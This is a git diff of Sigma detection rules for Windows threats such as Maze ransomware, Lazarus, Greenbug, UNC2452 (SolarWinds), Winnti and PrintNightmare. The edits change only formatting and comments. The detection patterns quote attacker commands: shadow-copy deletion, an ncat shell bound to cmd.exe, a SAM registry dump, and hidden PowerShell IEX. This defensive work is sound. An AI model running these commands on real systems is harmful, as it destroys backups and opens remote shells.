HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden + CommandLine|contains: - -Property DWORD -name DisableFirstRunCustomize -value 2 -Force - -Property String -name Check_Associations -value - -Property DWORD -name IEHarden -value 0 -Force diff --git a/sigma/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml b/sigma/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml index c6519dbb2..1175563a7 100644 --- a/sigma/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml +++ b/sigma/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml @@ -1,8 +1,7 @@ title: Potential Maze Ransomware Activity id: 29fd07fc-9cfd-4331-b7fd-cc18dfa21052 status: test -description: Detects specific process characteristics of Maze ransomware word document - droppers +description: Detects specific process characteristics of Maze ransomware word document droppers references: - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html - https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/ @@ -21,19 +20,21 @@ logsource: category: process_creation product: windows detection: + # Dropper process_creation: EventID: 4688 Channel: Security selection1: ParentProcessName|endswith: \WINWORD.exe - NewProcessName|endswith: .tmp + NewProcessName|endswith: .tmp selection2: - CommandLine|endswith: shadowcopy delete - NewProcessName|endswith: \wmic.exe + CommandLine|endswith: shadowcopy delete + # Specific Pattern + NewProcessName|endswith: \wmic.exe ParentProcessName|contains: \Temp\ selection3: - CommandLine|endswith: shadowcopy delete - CommandLine|contains: \..\..\system32 + CommandLine|endswith: shadowcopy delete + CommandLine|contains: \..\..\system32 condition: process_creation and (1 of selection*) fields: - SubjectUserName diff --git a/sigma/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml b/sigma/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml index 514cef348..bd10990aa 100644 --- a/sigma/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml +++ b/sigma/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml @@ -1,8 +1,7 @@ title: EvilNum APT Golden Chickens Deployment Via OCX Files id: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0 status: test -description: Detects Golden Chickens deployment method as used by Evilnum and described - in ESET July 2020 report +description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report references: - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/ @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - regsvr32 - /s - /i diff --git a/sigma/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml b/sigma/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml index db033917d..0d71c46b8 100644 --- a/sigma/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml +++ b/sigma/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml @@ -1,8 +1,7 @@ title: GALLIUM IOCs id: 440a56bf-7873-4439-940a-1c8a671073c2 status: test -description: Detects artifacts associated with GALLIUM cyber espionage group as reported - by Microsoft Threat Intelligence Center in the December 2019 report. +description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml @@ -64,46 +63,46 @@ detection: - SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de - SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2 selection_hashes: - - sha256: - - 9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd - - 7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b - - 657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 - - 2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 - - 52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 - - a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 - - 5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 - - 6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 - - 3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e - - 1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 - - fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 - - 7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c - - 178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 - - 51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 - - 889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 - - 332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf - - 44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 - - 63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef - - 056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 - - sha1: - - 53a44c2396d15c3a03723fa5e5db54cafd527635 - - 9c5e496921e3bc882dc40694f1dcc3746a75db19 - - aeb573accfd95758550cf30bf04f389a92922844 - - 79ef78a797403a4ed1a616c68e07fff868a8650a - - 4f6f38b4cec35e895d91c052b1f5a83d665c2196 - - 1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d - - e841a63e47361a572db9a7334af459ddca11347a - - c28f606df28a9bc8df75a4d5e5837fc5522dd34d - - 2e94b305d6812a9f96e6781c888e48c7fb157b6b - - dd44133716b8a241957b912fa6a02efde3ce3025 - - 8793bf166cb89eb55f0593404e4e933ab605e803 - - a39b57032dbb2335499a51e13470a7cd5d86b138 - - 41cc2b15c662bc001c0eb92f6cc222934f0beeea - - d209430d6af54792371174e70e27dd11d3def7a7 - - 1c6452026c56efd2c94cea7e0f671eb55515edb0 - - c6b41d3afdcdcaf9f442bbe772f5da871801fd5a - - 4923d460e22fbbf165bbbaba168e5a46b8157d9f - - f201504bd96e81d0d350c3a8332593ee1c9e09de - - ddd2db1127632a2a52943a2fe516a2e7d05d70d2 + - sha256: + - 9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd + - 7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b + - 657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 + - 2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 + - 52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 + - a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 + - 5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 + - 6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 + - 3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e + - 1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 + - fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 + - 7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c + - 178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 + - 51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 + - 889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 + - 332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf + - 44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 + - 63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef + - 056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 + - sha1: + - 53a44c2396d15c3a03723fa5e5db54cafd527635 + - 9c5e496921e3bc882dc40694f1dcc3746a75db19 + - aeb573accfd95758550cf30bf04f389a92922844 + - 79ef78a797403a4ed1a616c68e07fff868a8650a + - 4f6f38b4cec35e895d91c052b1f5a83d665c2196 + - 1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d + - e841a63e47361a572db9a7334af459ddca11347a + - c28f606df28a9bc8df75a4d5e5837fc5522dd34d + - 2e94b305d6812a9f96e6781c888e48c7fb157b6b + - dd44133716b8a241957b912fa6a02efde3ce3025 + - 8793bf166cb89eb55f0593404e4e933ab605e803 + - a39b57032dbb2335499a51e13470a7cd5d86b138 + - 41cc2b15c662bc001c0eb92f6cc222934f0beeea + - d209430d6af54792371174e70e27dd11d3def7a7 + - 1c6452026c56efd2c94cea7e0f671eb55515edb0 + - c6b41d3afdcdcaf9f442bbe772f5da871801fd5a + - 4923d460e22fbbf165bbbaba168e5a46b8157d9f + - f201504bd96e81d0d350c3a8332593ee1c9e09de + - ddd2db1127632a2a52943a2fe516a2e7d05d70d2 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml b/sigma/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml index 7e3c939fe..3d9a4471d 100644 --- a/sigma/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml +++ b/sigma/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml @@ -1,11 +1,10 @@ title: GALLIUM Artefacts - Builtin id: 3db10f25-2527-4b79-8d4b-471eb900ee29 related: - - id: 440a56bf-7873-4439-940a-1c8a671073c2 - type: derived + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived status: test -description: Detects artefacts associated with activity group GALLIUM - Microsoft - Threat Intelligence Center indicators released in December 2019. +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) @@ -20,8 +19,7 @@ tags: logsource: product: windows service: dns-server-analytic - definition: 'Requirements: Microsoft-Windows-DNS-Server/Analytical ({EB79061A-A566-4698-9119-3ED2807060E7}) - Event Log must be collected in order to receive the events.' + definition: 'Requirements: Microsoft-Windows-DNS-Server/Analytical ({EB79061A-A566-4698-9119-3ED2807060E7}) Event Log must be collected in order to receive the events.' detection: dns_server_analytic: Channel: Microsoft-Windows-DNS-Server/Analytical diff --git a/sigma/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml b/sigma/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml index fef46793a..0c0730e8d 100644 --- a/sigma/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml +++ b/sigma/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml @@ -1,8 +1,7 @@ title: Greenbug Espionage Group Indicators id: 3711eee4-a808-4849-8a14-faf733da3612 status: test -description: Detects tools and process executions used by Greenbug in their May 2020 - campaign as reported by Symantec +description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia author: Florian Roth (Nextron Systems) @@ -25,23 +24,23 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - :\ProgramData\adobe\Adobe.exe - :\ProgramData\oracle\local.exe - \revshell.exe - \infopagesbackup\ncat.exe - :\ProgramData\comms\comms.exe selection_msf: - CommandLine|contains|all: + CommandLine|contains|all: - -ExecutionPolicy Bypass -File - \msf.ps1 selection_ncat: - CommandLine|contains|all: + CommandLine|contains|all: - infopagesbackup - \ncat - -e cmd.exe selection_powershell: - CommandLine|contains: + CommandLine|contains: - system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill - -nop -w hidden -c $k=new-object - '[Net.CredentialCache]::DefaultCredentials;IEX ' @@ -49,7 +48,7 @@ detection: - -noninteractive -executionpolicy bypass whoami - -noninteractive -executionpolicy bypass netstat -a selection_other: - CommandLine|contains: L3NlcnZlcj1 + CommandLine|contains: L3NlcnZlcj1 # base64 encoded '/server=' condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml b/sigma/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml index 0a8e7b55d..8682aeb67 100644 --- a/sigma/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml +++ b/sigma/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml @@ -1,11 +1,10 @@ title: Lazarus Group Activity id: 24c4d154-05a4-4b99-b57d-9b977472443a related: - - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e - type: obsoletes + - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e + type: obsoletes status: test -description: Detects different process execution behaviors as described in various - threat reports on Lazarus group activity +description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity references: - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ - https://www.hvs-consulting.de/lazarus-report/ @@ -25,32 +24,33 @@ detection: EventID: 4688 Channel: Security selection_generic: - CommandLine|contains: + CommandLine|contains: - reg.exe save hklm\sam %temp%\~reg_sam.save - 1q2w3e4r@#$@#$@#$ - ' -hp1q2w3e4 ' - '.dat data03 10000 -p ' selection_netstat: - CommandLine|contains|all: + CommandLine|contains|all: - 'netstat -aon | find ' - ESTA - ' > %temp%\~' + # Network share discovery selection_network_discovery: - CommandLine|contains|all: + CommandLine|contains|all: - .255 10 C:\ProgramData\IBM\ - .DAT selection_persistence: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c ' - ' -p 0x' - CommandLine|contains: + CommandLine|contains: - C:\ProgramData\ - C:\RECYCLER\ selection_rundll32: - CommandLine|contains|all: + CommandLine|contains|all: - 'rundll32 ' - C:\ProgramData\ - CommandLine|contains: + CommandLine|contains: - .bin, - .tmp, - .dat, diff --git a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml index cb55770e5..460e604ce 100644 --- a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml +++ b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml @@ -1,8 +1,7 @@ title: UNC2452 Process Creation Patterns id: 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f status: test -description: Detects a specific process creation patterns as seen used by UNC2452 - and provided by Microsoft as Microsoft Defender ATP queries +description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries references: - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ author: Florian Roth (Nextron Systems) @@ -12,32 +11,35 @@ tags: - attack.execution - attack.t1059.001 - detection.emerging_threats + # - sunburst + # - unc2452 logsource: category: process_creation product: windows detection: + # To avoid writing complex condition. "selection_generic_1" and "selection_generic_2" are the same except for the extension used. process_creation: EventID: 4688 Channel: Security selection_generic_1: - CommandLine|contains: + CommandLine|contains: - 7z.exe a -v500m -mx9 -r0 -p - 7z.exe a -mx9 -r0 -p - CommandLine|contains|all: + CommandLine|contains|all: - .zip - .txt selection_generic_2: - CommandLine|contains: + CommandLine|contains: - 7z.exe a -v500m -mx9 -r0 -p - 7z.exe a -mx9 -r0 -p - CommandLine|contains|all: + CommandLine|contains|all: - .zip - .log selection_generic_3: ParentCommandLine|contains|all: - wscript.exe - .vbs - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - C:\Windows - .dll,Tk_ @@ -45,12 +47,12 @@ detection: ParentCommandLine|contains: - C:\Windows - .dll - CommandLine|contains: 'cmd.exe /C ' + CommandLine|contains: 'cmd.exe /C ' ParentProcessName|endswith: \rundll32.exe selection_generic_5: - CommandLine: '' + CommandLine: '' ParentProcessName|endswith: \rundll32.exe - NewProcessName|endswith: \dllhost.exe + NewProcessName|endswith: \dllhost.exe condition: process_creation and (1 of selection_generic_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml index 05cd9b7f4..08ee32a67 100644 --- a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml +++ b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml @@ -1,8 +1,7 @@ title: UNC2452 PowerShell Pattern id: b7155193-8a81-4d8f-805d-88de864ca50c status: test -description: Detects a specific PowerShell command line pattern used by the UNC2452 - actors as mentioned in Microsoft and Symantec reports +description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ @@ -15,6 +14,7 @@ tags: - attack.t1059.001 - attack.t1047 - detection.emerging_threats + # - sunburst logsource: category: process_creation product: windows @@ -23,11 +23,11 @@ detection: EventID: 4688 Channel: Security selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - Invoke-WMIMethod win32_process -name create -argumentlist - rundll32 c:\windows selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'wmic /node:' - process call create "rundll32 c:\windows condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml index 6052eca6b..4c88c59f0 100644 --- a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml +++ b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml @@ -19,14 +19,14 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - Execute - CreateObject - RegRead - window.close - \Microsoft\Windows\CurrentVersion filter: - CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Run + CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Run condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml b/sigma/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml index 82499d81f..16b628b3d 100644 --- a/sigma/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml +++ b/sigma/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml @@ -1,8 +1,7 @@ title: TAIDOOR RAT DLL Load id: d1aa3382-abab-446f-96ea-4de52908210b status: test -description: Detects specific process characteristics of Chinese TAIDOOR RAT malware - load +description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a author: Florian Roth (Nextron Systems) @@ -20,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - dll,MyStart - dll MyStart selection2a: - CommandLine|endswith: ' MyStart' + CommandLine|endswith: ' MyStart' selection2b: - CommandLine|contains: rundll32.exe + CommandLine|contains: rundll32.exe condition: process_creation and (selection1 or ( selection2a and selection2b )) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml b/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml index cf725b029..6b0ce0a17 100644 --- a/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml +++ b/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml @@ -1,8 +1,7 @@ title: Winnti Malware HK University Campaign id: 3121461b-5aa0-4a41-b910-66d25524edbb status: test -description: Detects specific process characteristics of Winnti malware noticed in - Dec/Jan 2020 in a campaign against Honk Kong universities +description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities references: - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ author: Florian Roth (Nextron Systems), Markus Neis @@ -24,18 +23,18 @@ detection: ParentProcessName|contains: - C:\Windows\Temp - \hpqhvind.exe - NewProcessName|startswith: C:\ProgramData\DRM + NewProcessName|startswith: C:\ProgramData\DRM selection2: ParentProcessName|startswith: C:\ProgramData\DRM - NewProcessName|endswith: \wmplayer.exe + NewProcessName|endswith: \wmplayer.exe selection3: ParentProcessName|endswith: \Test.exe - NewProcessName|endswith: \wmplayer.exe + NewProcessName|endswith: \wmplayer.exe selection4: - NewProcessName: C:\ProgramData\DRM\CLR\CLR.exe + NewProcessName: C:\ProgramData\DRM\CLR\CLR.exe selection5: ParentProcessName|startswith: C:\ProgramData\DRM\Windows - NewProcessName|endswith: \SearchFilterHost.exe + NewProcessName|endswith: \SearchFilterHost.exe condition: process_creation and (1 of selection*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml b/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml index f875df92a..79e0e4db9 100644 --- a/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml +++ b/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml @@ -1,8 +1,7 @@ title: Winnti Pipemon Characteristics id: 73d70463-75c9-4258-92c6-17500fe972f2 status: stable -description: Detects specific process characteristics of Winnti Pipemon malware reported - by ESET +description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET references: - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ author: Florian Roth (Nextron Systems), oscd.community @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: setup0.exe -p + CommandLine|contains: setup0.exe -p selection_2: - CommandLine|contains: setup.exe - CommandLine|endswith: + CommandLine|contains: setup.exe + CommandLine|endswith: - -x:0 - -x:1 - -x:2 diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml index 10cfe04d5..4b2d5c861 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml @@ -1,9 +1,7 @@ title: Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection id: 6fe1719e-ecdf-4caf-bffe-4f501cb0a561 status: stable -description: Detects the suspicious file that is created from PoC code against Windows - Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), - CVE-2021-1675 . +description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 . references: - https://twitter.com/mvelazco/status/1410291741241102338 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675 @@ -20,7 +18,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 @@ -39,7 +37,7 @@ detection: selection: Path|contains: :\Windows\System32\spool\drivers\x64\ keywords: - - File submitted to Symantec + - File submitted to Symantec # symantec fp, pending analysis, more generic condition: antivirus and (selection and not keywords) falsepositives: - Unlikely, or pending PSP analysis diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml index 06c0b2029..c2eef25e8 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml @@ -1,8 +1,7 @@ title: Possible CVE-2021-1675 Print Spooler Exploitation id: 4e64668a-4da1-49f5-a8df-9e2d5b866718 status: test -description: Detects events of driver load errors in print service logs that could - be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 +description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare @@ -28,6 +27,7 @@ detection: - '0x7e' keywords: - The print spooler failed to load a plug-in module + # default file names used in PoC codes - MyExploit.dll - evil.dll - \addCube.dll @@ -37,7 +37,7 @@ detection: - \mimilib.dll - \mimispool.dll falsepositive: - - ' registration timed out' + - ' registration timed out' # ex: The print spooler failed to load a plug-in module PrintConfig registration timed out condition: printservice_admin and ((selection or keywords) and not falsepositive) fields: - PluginDllName diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml index 89d83201f..caf656ee0 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml @@ -1,8 +1,7 @@ title: CVE-2021-1675 Print Spooler Exploitation id: f34d942d-c8c4-4f1f-b196-22471aecf10a status: test -description: Detects driver load events print service operational log that are a sign - of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 +description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 references: - https://twitter.com/MalwareJake/status/1410421967463731200 author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml index b89dd78f0..4b2792344 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml @@ -1,9 +1,7 @@ title: CVE-2021-1675 Print Spooler Exploitation IPC Access id: 8fe1c584-ee61-444b-be21-e9054b229694 status: test -description: Detects remote printer driver load from Detailed File Share in Security - logs that are a sign of successful exploitation attempts against print spooler - vulnerability CVE-2021-1675 and CVE-2021-34527 +description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 references: - https://twitter.com/INIT_3/status/1410662463641731075 author: INIT_6 @@ -23,7 +21,7 @@ detection: Channel: Security selection: EventID: 5145 - ShareName: \\\\\*\\IPC$ + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ RelativeTargetName: spoolss AccessMask: '0x3' ObjectType: File diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml index 19f4dccc9..cfa8f9d99 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml @@ -1,8 